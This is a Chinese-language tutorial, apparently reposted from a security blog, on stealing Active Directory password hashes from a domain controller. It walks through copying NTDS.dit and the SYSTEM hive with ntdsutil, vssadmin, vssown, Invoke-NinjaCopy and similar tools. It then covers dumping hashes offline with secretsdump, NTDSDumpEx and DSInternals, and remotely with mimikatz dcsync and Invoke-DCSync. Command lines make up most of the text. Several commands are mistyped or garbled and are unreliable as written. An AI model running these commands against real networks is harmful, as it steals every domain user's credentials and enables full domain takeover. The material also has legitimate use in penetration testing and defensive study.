域控密码抓取

域控密码抓取

NTDS.DIT是DC的数据库，内容有域用户、域组、用户Hash等信息，域控上的ntds.dit只有可以登录到域控的用户（如域管用户、DC本地管理员用户）可以访问，为了进一步掩护密码hash值，使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。
位置：C:\Windows\NTDS

使用卷影拷贝提取域控NTDS

从Windows XP SP2和Windows Server 2003 开始，微软就向Windows操作系统中引入了一项名叫卷影拷贝的服务（Volume Shadow Copy Service-VSS）。这种服务允许Windows系统以手动大概自动的方式对文件或磁盘卷宗的当前状态进行备份（快照）。要留意的是，在这个过程中，即使文件处于打开状态下，该服务仍然可以直接进行文件备份。
NTDS.dit文件是默认杯Windows系统锁定的，想要读取该文件就要使用卷影拷贝服务，得到NTDS.dit文件的副本。
使用ntdsutil工具

ntdsutil.exe是一个为活动目次提供管理机制的命令行工具，该工具默认安装在域控服务器上，可以在域控制器上直接操作。

第一步：创建一个NTDS快照

1. ntdsutil.exe snapshot "activate instance ntds" create q q

复制代码

可以看到快照的uid

第二步：加载快照到磁盘中

1. ntdsutil.exe snapshot "mount {uid}"q q

复制代码

第三步：复制快照中的ntds.dit文件

1. copy 快照地址\Windows\NTDS\ntds.dit 目标地址

复制代码

第四步：删除快照

1. ntdsutil.exe snapshot "umount {uid}" "delete {uid}" q q

复制代码

通过vssadmin工具

vssadmin是Windows Server 2008以及Windows 7系统以上提供的VSS管理工具，它可以用于创建或删除卷影副本，列出卷影副本信息，他需要两步就可以提取NTDS文件
1.第一步：创建一个C盘快照

1. vssadmin create shadow /for=c:

复制代码

第二步：将快照中的NTDS文件复制出来

1. copy 卷影副本卷名\windows\NTDS\ntds.dit 地址

复制代码

末了在进行删除

1. vssadmin delete shadows /for=c: /quiet

复制代码

IFM方式进行拷贝

在使用ntdsutil创建媒体安装集（IFM）时，需要进行天生快照、加载、将ntds.dit和盘算机的SAM文件复制到目的文件夹中等操作

1. ntdsutil "ac i ntds" "ifm" "create full c:/test" q q

复制代码

此时，ntds.dit将被保存在C:\test\ActiveDirectory下，SYSTEN和SECURITY；两个文件将被保存在C:\test\registry文件夹下
第二步就是复制文件

1. copy "c:\teet\Active Directory\ntds.dit" C:\Users\Administrator\Desktop\ntds.dit

复制代码

vssown提取ntds.dit

vssown是一个vbs脚本，可以创建和删除卷影副本
1.启动卷影复礼服务

1. cscript vssown.vbs /start

复制代码

2.创建一个C盘的卷影副本

1. cscript vssown.vbs \create c

复制代码

3.列出当前卷影副本

1. cscript vssown.vbs /list

复制代码

4、复制文件到指定目次

1. copy 卷影副本卷名\windows\NTDS\ntds.dit 地址

复制代码

末了删除副本

1. cscript vssown.vbs /delete {uid}

复制代码

Copy-VSS.ps1

可以使用PS脚本直接导出

1. Import-Module .\Copy-VSS.ps1
2. Copy-VSS

复制代码

Invoke-NinjaCopy

Invoke-NinjaCopy也是PS脚本，可以直接导出NTDS和system文件

1. Import-Module -name .\Invoke-NinjaCopy.ps1
2. Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\ntds.dit"(目标地址)
3. Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"(目标地址)

复制代码

离线读取NTDS文件中的hash

离线读取主要就是两步，第一步就是将域控的ntds.dit下载到本地
第二步就是在本地进行使用
留意：由于system.hive 李存放着ntds.dit的密钥，所以需要转储system.hive，不然没发检察ntds.dit里的内容
命令如下

1. reg save hklm\system c:\windows\temp\system.hive

复制代码

接下来介绍几种读取里面内容的方式，大家选一个顺手的就行
1.secretsdump.exe 工具读取

1. secretsdump.exe -system system.hive -ntds ntds.dit LOCAL

复制代码

2.NTDSDump.exe工具读取

1. NTDSDumpEx -d ntds.dit -s system -o 1.txt

复制代码

3.DS Internals工具读取

此工具是PS脚本，使用命令如下

1. 1、安装DS Internals
2. Install-Moudle DS Internals -Force 安装方式
3. Import-Module .\DS Internals 导入方式
4. 2.导出hash并保存在txt文件
5. $key = Get-Boot key -Boot key 'system路径'
6. Get-ADD Account -All -DB Path 'ntds路径' -Boot key $key|Out-file output_hash.txt

复制代码

在线读取NTDS文件中的hash

1.使用mimikatz

1. lsadump::dcsync /domain:abc.com /all /csv   （读取所有）
2. lsadump::dcsync /domain:abc.com /user:administrator（读取单个用户）

复制代码

2.使用QuarksPWDump工具

条件：ntds这个文件必须先导出来

1. Quarks PW Dump.exe --dump-hash-domain  --ntds-file ntds.dit

复制代码

3.使用secretsdump工具

1. retsdump.exe 域名/administrator:密码@IP -outputfile 1.txt

复制代码

4.使用Invoke-DC Sync工具

1. Import-Module .\Invoke-DCSync.ps1
2. Invole-DCSync

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。